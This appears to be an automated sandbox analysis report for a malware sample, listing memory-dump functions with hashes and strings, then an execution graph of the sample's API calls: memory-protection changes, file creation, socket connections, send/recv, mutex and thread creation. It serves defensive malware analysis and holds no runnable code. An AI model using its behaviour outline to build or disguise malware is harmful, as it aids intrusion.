                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c15f2c3159a6390166eee9e77feedf9cecd9e3483171c4df49858a180dff1b1f
                                                    • Instruction ID: 600b37099330be1b0c83f0931be31060b0a272803b8a9e48d4e8541aea0725eb
                                                    • Opcode Fuzzy Hash: c15f2c3159a6390166eee9e77feedf9cecd9e3483171c4df49858a180dff1b1f
                                                    • Instruction Fuzzy Hash: B490022160184842D64472584904B0F410597E2202F95C019A425B554CCA1989555725
                                                    Function 01183090 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7c05b62aa096bf6e60a817ab1107dc6fc4c50d8d5c81a4cadca4a28426368d00
                                                    • Instruction ID: c5a59619c55f27e4808ac809120ecf237e2709073a495f7d00657f72810e6375
                                                    • Opcode Fuzzy Hash: 7c05b62aa096bf6e60a817ab1107dc6fc4c50d8d5c81a4cadca4a28426368d00
                                                    • Instruction Fuzzy Hash: 3990022164140C02D644715885147070006D7D1601F55C011A0129554DC71A8A6567B5
                                                    Function 011835C0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 774690b69b33b97f2f5c4965475795bdebd26cebad3e38f4ddeefcc0e1412543
                                                    • Instruction ID: c69c9fc33a7f4114a80cc5d3d98ced325acaacba2db3faa974abbb3cf96745a6
                                                    • Opcode Fuzzy Hash: 774690b69b33b97f2f5c4965475795bdebd26cebad3e38f4ddeefcc0e1412543
                                                    • Instruction Fuzzy Hash: 15900231A0550802D60471584614706100597D1201F65C411A0529568DC7998A5166A6
                                                    Function 011839B0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fbf70f123e9269724f0526a7a45b451a5778b5452c361665d3bc8d798e201df4
                                                    • Instruction ID: f1312ad86998376537bfefb9ed775953282df45adb6965f87807943ef8526bd7
                                                    • Opcode Fuzzy Hash: fbf70f123e9269724f0526a7a45b451a5778b5452c361665d3bc8d798e201df4
                                                    • Instruction Fuzzy Hash: B490022164545502D654715C45046164005B7E1201F55C021A0919594DC65989556325
                                                    Function 01183D10 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 933cd6584adbf17dc7c23e926d53eb28c99ab3b2bba17f2324ca04ed723b2bff
                                                    • Instruction ID: da17f8620cf5c627ab2d50de54acbed0263c0aef1acacf6a69e0a0736d723b5b
                                                    • Opcode Fuzzy Hash: 933cd6584adbf17dc7c23e926d53eb28c99ab3b2bba17f2324ca04ed723b2bff
                                                    • Instruction Fuzzy Hash: 67900231602405429A4472585904A4E410597E2302B95D415A011A554CCA1889615325
                                                    Function 01183D70 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8aae81b8fee63832df4140ce2c6249bf0c770f994d647528a91224aaa4ed4339
                                                    • Instruction ID: 1b727cb4021aa1562d745d7d74c6e0ea986f35873c178209b7ba02a95b05feca
                                                    • Opcode Fuzzy Hash: 8aae81b8fee63832df4140ce2c6249bf0c770f994d647528a91224aaa4ed4339
                                                    • Instruction Fuzzy Hash: FA90023560140802DA1471585904646004697D1301F55D411A0529558DC75889A1A225
                                                    Function 01182C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                    • Instruction ID: 0075205a8685af95dc3ad3e065614918109edc0fff6d869f7f2599a636ebb662
                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                    • Instruction Fuzzy Hash:
                                                    Function 01182890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 94eb677ab28fdeb630383a9885a77332ae0fa56281b3413367c57c9b29f26e41
                                                    • Instruction ID: 69707687f69e99cd1cb41684c8419a7aa1c1aa1f2a8deb61de72fea51323fc01
                                                    • Opcode Fuzzy Hash: 94eb677ab28fdeb630383a9885a77332ae0fa56281b3413367c57c9b29f26e41
                                                    • Instruction Fuzzy Hash: FF51D6B5E00116BFCF1AEB9D889097EFBF8BB49240714C169E465D7645E334DE50CBA0
                                                    Function 011F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 8ea2b0c3605b3a27e7399c1b8011248b1d234d543d5e95d6c25feeeca204d8d1
                                                    • Instruction ID: b48932e4e2b2988d452666c421728d361617968f38b1710bd57b9250fc561fc5
                                                    • Opcode Fuzzy Hash: 8ea2b0c3605b3a27e7399c1b8011248b1d234d543d5e95d6c25feeeca204d8d1
                                                    • Instruction Fuzzy Hash: 94510675A04646AFDB38DF9CC8909BFBBF9EB48200B04845DE6A6D7641E7B4DA40C760
                                                    Function 01177630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Execute=1, xrefs: 011B4713
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 011B4725
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 011B4655
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 011B4742
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 011B4787
                                                    • ExecuteOptions, xrefs: 011B46A0
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011B46FC
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 0-484625025
                                                    • Opcode ID: 1a665e051f5ffc97a20899f42fe36af8a1123e31480bdcc17ab3c6c45dfd7dbf
                                                    • Instruction ID: 5a064d150f2aa202352219ff063d68271cdff5cbeda218f01088ee5c1b9e6775
                                                    • Opcode Fuzzy Hash: 1a665e051f5ffc97a20899f42fe36af8a1123e31480bdcc17ab3c6c45dfd7dbf
                                                    • Instruction Fuzzy Hash: 8B51FB31A0021A7AEF1DEBA8EC9DFED77B9AF14704F0400A9E605A72C1E7719A45CF51
                                                    Function 01216940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                    • Instruction ID: ded3193f2a2ec4cdc7d652b06f851fdaf699481dc3d56b362485a0cead06039b
                                                    • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                    • Instruction Fuzzy Hash: 74022571518342AFD305DF18C490A6FBBE5FFD8704F148A2DBA898B258DB71E905CB52
                                                    Function 0118B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-$0$0
                                                    • API String ID: 1302938615-699404926
                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction ID: fe45715b8f8d229e94fc45f6a92100cda8e7df24535097717a438fc5954938b5
                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction Fuzzy Hash: 9681D170E196498EEF2DBE6CC8507FEBBB1AF46324F28C119D861A72D1C73498408F59
                                                    Function 011F20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$[$]:%u
                                                    • API String ID: 48624451-2819853543
                                                    • Opcode ID: 6f1c41d52d4601b9be3ce053fa0e97d503a9fe5ccf1d5f168e599a915f5c2b97
                                                    • Instruction ID: d4c53aeaa99499daddf9d6f500d89c21c6b3213981457bf18748543585adddbd
                                                    • Opcode Fuzzy Hash: 6f1c41d52d4601b9be3ce053fa0e97d503a9fe5ccf1d5f168e599a915f5c2b97
                                                    • Instruction Fuzzy Hash: 5621657AA00119ABDB19DF79DC40AEFBBF8EF54644F44011AEA15D3200E730D9018BA5
                                                    Function 0116F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011B02BD
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011B02E7
                                                    • RTL: Re-Waiting, xrefs: 011B031E
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                    • API String ID: 0-2474120054
                                                    • Opcode ID: c4d6f54ff0c17dd07d38def4caa4dc94f6e6fda24ff43ec6736ecf5c42084a81
                                                    • Instruction ID: e1650a682ee27013a11818285e0f8c5e74d617494d06113a53f383a19b2fcd1a
                                                    • Opcode Fuzzy Hash: c4d6f54ff0c17dd07d38def4caa4dc94f6e6fda24ff43ec6736ecf5c42084a81
                                                    • Instruction Fuzzy Hash: CCE10E302087429FD72DCF28D894B6ABBE4BB88314F144A5DF5A58B2E1D735D856CB42
                                                    Function 0117BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 011B7B7F
                                                    • RTL: Re-Waiting, xrefs: 011B7BAC
                                                    • RTL: Resource at %p, xrefs: 011B7B8E
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 0-871070163
                                                    • Opcode ID: 04b415ef343ee9c3ce4d7f015fc038373db29f8901535b5abe2938a99e983715
                                                    • Instruction ID: a91fb0a753d1051d5ea198f9884b8ee185fc1198a308fa2d9ccc9c6a5a31793a
                                                    • Opcode Fuzzy Hash: 04b415ef343ee9c3ce4d7f015fc038373db29f8901535b5abe2938a99e983715
                                                    • Instruction Fuzzy Hash: F041E2313097029FD728DE29C940B6AB7E5EF99B10F100A1DF95AD7780DB31E5058F96
                                                    Function 0117B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011B728C
                                                    Strings
                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 011B7294
                                                    • RTL: Re-Waiting, xrefs: 011B72C1
                                                    • RTL: Resource at %p, xrefs: 011B72A3
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-605551621
                                                    • Opcode ID: 7ff8fbd07841db4e01dfefbfa1fcc2db718373be23fb6e88d43d762dd7fa7362
                                                    • Instruction ID: 7d970548414c21649d9c471b49787a0bcf046a689a1d6e5f7c95ecce3b3f41da
                                                    • Opcode Fuzzy Hash: 7ff8fbd07841db4e01dfefbfa1fcc2db718373be23fb6e88d43d762dd7fa7362
                                                    • Instruction Fuzzy Hash: 7141F031604206ABC729DE29CC81BAAB7B5FFA4714F100619F956AB3C0DB31E852CBD5
                                                    Function 011F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: e249ef761969b8053431df36cfcced270ff9530a3233e4c20c32f3de7a100c8d
                                                    • Instruction ID: 59df2f3e9c5005c84ae6ad619095c4f6f4bbf069506ccd63b602cf81349ba877
                                                    • Opcode Fuzzy Hash: e249ef761969b8053431df36cfcced270ff9530a3233e4c20c32f3de7a100c8d
                                                    • Instruction Fuzzy Hash: 01316672A006199FDB28DF2DDC40BEEB7F8FB58614F444559E949E3240EB30DA458FA0
                                                    Function 01187D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-
                                                    • API String ID: 1302938615-2137968064
                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction ID: 3ed77d1a1ce381180f291ae0c832fcef4bcb33fd3867a52c4e20fe6b6ce0aa6d
                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction Fuzzy Hash: 42919471E002169AEB2CEF6DC8816BEBBA5AF44720F64C51AE965E72C0D73099418F52
                                                    Function 01149126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$@
                                                    • API String ID: 0-1194432280
                                                    • Opcode ID: 7d69e4be699960bf1036b2cf5b6d7220f6133c0332ff4cd333ce9662302f5806
                                                    • Instruction ID: 43bc7339d5a2aecf149d4202c4e6b2eb593f6aca23cc6093a1b3160a2ecdd6d4
                                                    • Opcode Fuzzy Hash: 7d69e4be699960bf1036b2cf5b6d7220f6133c0332ff4cd333ce9662302f5806
                                                    • Instruction Fuzzy Hash: 94812C75D002699BDB39DB54CC44BEEBBB8AF08754F0041EAEA19B7280D7705E85CFA1

                                                    Execution Graph

                                                    Execution Coverage:2.3%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:4.7%
                                                    Total number of Nodes:444
                                                    Total number of Limit Nodes:16
                                                    execution_graph 13759 e4dca4d 13760 e4dca53 13759->13760 13763 e4d0782 13760->13763 13762 e4dca6b 13765 e4d078f 13763->13765 13764 e4d07ad 13764->13762 13765->13764 13767 e4d5662 13765->13767 13768 e4d566b 13767->13768 13776 e4d57ba 13767->13776 13769 e4cf0f2 6 API calls 13768->13769 13768->13776 13771 e4d56ee 13769->13771 13770 e4d5750 13773 e4d583f 13770->13773 13774 e4d5791 13770->13774 13770->13776 13771->13770 13772 e4daf82 6 API calls 13771->13772 13772->13770 13775 e4daf82 6 API calls 13773->13775 13773->13776 13774->13776 13777 e4daf82 6 API calls 13774->13777 13775->13776 13776->13764 13777->13776 13778 e4dbe0a 13779 e4da942 13778->13779 13780 e4dbe45 NtProtectVirtualMemory 13779->13780 13781 e4dbe70 13780->13781 13906 e4d414a 13907 e4d4153 13906->13907 13912 e4d4174 13906->13912 13909 e4d6382 ObtainUserAgentString 13907->13909 13908 e4d41e7 13910 e4d416c 13909->13910 13911 e4cf0f2 6 API calls 13910->13911 13911->13912 13912->13908 13914 e4cf1f2 13912->13914 13915 e4cf2c9 13914->13915 13916 e4cf20f 13914->13916 13915->13912 13917 e4d9f12 7 API calls 13916->13917 13919 e4cf242 13916->13919 13917->13919 13918 e4cf289 13918->13915 13920 e4cf0f2 6 API calls 13918->13920 13919->13918 13921 e4d0432 NtCreateFile 13919->13921 13920->13915 13921->13918 13743 e4daf82 13744 e4dafb8 13743->13744 13745 e4d75b2 socket 13744->13745 13747 e4db081 13744->13747 13754 e4db022 13744->13754 13745->13747 13746 e4db134 13748 e4d7732 connect 13746->13748 13753 e4db1b2 13746->13753 13746->13754 13747->13746 13749 e4db117 getaddrinfo 13747->13749 13747->13754 13748->13753 13749->13746 13750 e4d76b2 send 13752 e4db729 13750->13752 13751 e4db7f4 setsockopt recv 13751->13754 13752->13751 13752->13754 13753->13750 13753->13754 13814 e4d2edd 13815 e4d2f06 13814->13815 13816 e4d2fa4 13815->13816 13817 e4cf8f2 NtProtectVirtualMemory 13815->13817 13818 e4d2f9c 13817->13818 13819 e4d6382 ObtainUserAgentString 13818->13819 13819->13816 13496 e4cf2dd 13497 e4cf31a 13496->13497 13498 e4cf3fa 13497->13498 13499 e4cf328 SleepEx 13497->13499 13503 e4d9f12 13497->13503 13512 e4d0432 13497->13512 13522 e4cf0f2 13497->13522 13499->13497 13499->13499 13507 e4d9f48 13503->13507 13504 e4da134 13504->13497 13505 e4da232 NtCreateFile 13505->13507 13506 e4da0e9 13509 e4da125 13506->13509 13540 e4d9842 13506->13540 13507->13504 13507->13505 13507->13506 13528 e4daf82 13507->13528 13548 e4d9922 13509->13548 13513 e4d045b 13512->13513 13521 e4d04c9 13512->13521 13514 e4da232 NtCreateFile 13513->13514 13513->13521 13515 e4d0496 13514->13515 13516 e4d04c5 13515->13516 13569 e4d0082 13515->13569 13518 e4da232 NtCreateFile 13516->13518 13516->13521 13518->13521 13519 e4d04b6 13519->13516 13578 e4cff52 13519->13578 13521->13497 13523 e4cf1d3 13522->13523 13524 e4cf109 13522->13524 13523->13497 13583 e4cf012 13524->13583 13526 e4cf113 13526->13523 13527 e4daf82 6 API calls 13526->13527 13527->13523 13529 e4dafb8 13528->13529 13532 e4db081 13529->13532 13539 e4db022 13529->13539 13556 e4d75b2 13529->13556 13531 e4db134 13538 e4db1b2 13531->13538 13531->13539 13559 e4d7732 13531->13559 13532->13531 13534 e4db117 getaddrinfo 13532->13534 13532->13539 13534->13531 13536 e4db7f4 setsockopt recv 13536->13539 13537 e4db729 13537->13536 13537->13539 13538->13539 13562 e4d76b2 13538->13562 13539->13507 13541 e4d986d 13540->13541 13565 e4da232 13541->13565 13543 e4d9906 13543->13506 13544 e4d9888 13544->13543 13545 e4daf82 6 API calls 13544->13545 13546 e4d98c5 13544->13546 13545->13546 13546->13543 13547 e4da232 NtCreateFile 13546->13547 13547->13543 13549 e4d99c2 13548->13549 13550 e4da232 NtCreateFile 13549->13550 13553 e4d99d6 13550->13553 13551 e4d9a9f 13551->13504 13552 e4d9a5d 13552->13551 13554 e4da232 NtCreateFile 13552->13554 13553->13551 13553->13552 13555 e4daf82 6 API calls 13553->13555 13554->13551 13555->13552 13557 e4d75ec 13556->13557 13558 e4d760a socket 13556->13558 13557->13558 13558->13532 13560 e4d7788 connect 13559->13560 13561 e4d776a 13559->13561 13560->13538 13561->13560 13563 e4d7705 send 13562->13563 13564 e4d76e7 13562->13564 13563->13537 13564->13563 13566 e4da25c 13565->13566 13568 e4da334 13565->13568 13567 e4da410 NtCreateFile 13566->13567 13566->13568 13567->13568 13568->13544 13570 e4d0420 13569->13570 13571 e4d00aa 13569->13571 13570->13519 13571->13570 13572 e4da232 NtCreateFile 13571->13572 13573 e4d01f9 13572->13573 13574 e4da232 NtCreateFile 13573->13574 13577 e4d03df 13573->13577 13575 e4d03c9 13574->13575 13576 e4da232 NtCreateFile 13575->13576 13576->13577 13577->13519 13579 e4cff70 13578->13579 13580 e4cff84 13578->13580 13579->13516 13581 e4da232 NtCreateFile 13580->13581 13582 e4d0046 13581->13582 13582->13516 13585 e4cf031 13583->13585 13584 e4cf0cd 13584->13526 13585->13584 13586 e4daf82 6 API calls 13585->13586 13586->13584 13782 e4dca1f 13783 e4dca25 13782->13783 13786 e4d05f2 13783->13786 13785 e4dca3d 13787 e4d060e 13786->13787 13788 e4d05fb 13786->13788 13787->13785 13788->13787 13789 e4d5662 6 API calls 13788->13789 13789->13787 13945 e4d2dd9 13947 e4d2df0 13945->13947 13946 e4d2ecd 13947->13946 13948 e4d6382 ObtainUserAgentString 13947->13948 13948->13946 13820 e4d4cd4 13821 e4d4cd8 13820->13821 13822 e4d5022 13821->13822 13826 e4d4352 13821->13826 13824 e4d4f0d 13824->13822 13835 e4d4792 13824->13835 13827 e4d439e 13826->13827 13828 e4d44ec 13827->13828 13830 e4d4595 13827->13830 13834 e4d458e 13827->13834 13829 e4da232 NtCreateFile 13828->13829 13832 e4d44ff 13829->13832 13831 e4da232 NtCreateFile 13830->13831 13830->13834 13831->13834 13833 e4da232 NtCreateFile 13832->13833 13832->13834 13833->13834 13834->13824 13836 e4d47e0 13835->13836 13837 e4da232 NtCreateFile 13836->13837 13841 e4d490c 13837->13841 13838 e4d4af3 13838->13824 13839 e4d4352 NtCreateFile 13839->13841 13840 e4d4602 NtCreateFile 13840->13841 13841->13838 13841->13839 13841->13840 13790 e4d0613 13791 e4d0620 13790->13791 13792 e4d0684 13791->13792 13793 e4dbe12 NtProtectVirtualMemory 13791->13793 13793->13791 13735 e4dbe12 13736 e4dbe45 NtProtectVirtualMemory 13735->13736 13737 e4da942 13735->13737 13738 e4dbe70 13736->13738 13737->13736 13587 e4dbbac 13588 e4dbbb1 13587->13588 13621 e4dbbb6 13588->13621 13622 e4d1b72 13588->13622 13590 e4dbc2c 13591 e4dbc85 13590->13591 13593 e4dbc69 13590->13593 13594 e4dbc54 13590->13594 13590->13621 13592 e4d9ab2 NtProtectVirtualMemory 13591->13592 13595 e4dbc8d 13592->13595 13597 e4dbc6e 13593->13597 13598 e4dbc80 13593->13598 13596 e4d9ab2 NtProtectVirtualMemory 13594->13596 13658 e4d3102 13595->13658 13601 e4dbc5c 13596->13601 13602 e4d9ab2 NtProtectVirtualMemory 13597->13602 13598->13591 13599 e4dbc97 13598->13599 13605 e4dbcbe 13599->13605 13606 e4dbc9c 13599->13606 13644 e4d2ee2 13601->13644 13604 e4dbc76 13602->13604 13650 e4d2fc2 13604->13650 13608 e4dbcd9 13605->13608 13609 e4dbcc7 13605->13609 13605->13621 13626 e4d9ab2 13606->13626 13613 e4d9ab2 NtProtectVirtualMemory 13608->13613 13608->13621 13610 e4d9ab2 NtProtectVirtualMemory 13609->13610 13612 e4dbccf 13610->13612 13668 e4d32f2 13612->13668 13616 e4dbce5 13613->13616 13686 e4d3712 13616->13686 13624 e4d1b93 13622->13624 13623 e4d1cce 13623->13590 13624->13623 13625 e4d1cb5 CreateMutexW 13624->13625 13625->13623 13628 e4d9adf 13626->13628 13627 e4d9ebc 13636 e4d2de2 13627->13636 13628->13627 13698 e4cf8f2 13628->13698 13630 e4d9e5c 13631 e4cf8f2 NtProtectVirtualMemory 13630->13631 13632 e4d9e7c 13631->13632 13633 e4cf8f2 NtProtectVirtualMemory 13632->13633 13634 e4d9e9c 13633->13634 13635 e4cf8f2 NtProtectVirtualMemory 13634->13635 13635->13627 13638 e4d2df0 13636->13638 13637 e4d2ecd 13640 e4cf412 13637->13640 13638->13637 13723 e4d6382 13638->13723 13641 e4cf440 13640->13641 13642 e4cf473 13641->13642 13643 e4cf44d CreateThread 13641->13643 13642->13621 13643->13621 13645 e4d2f06 13644->13645 13646 e4d2fa4 13645->13646 13647 e4cf8f2 NtProtectVirtualMemory 13645->13647 13646->13621 13648 e4d2f9c 13647->13648 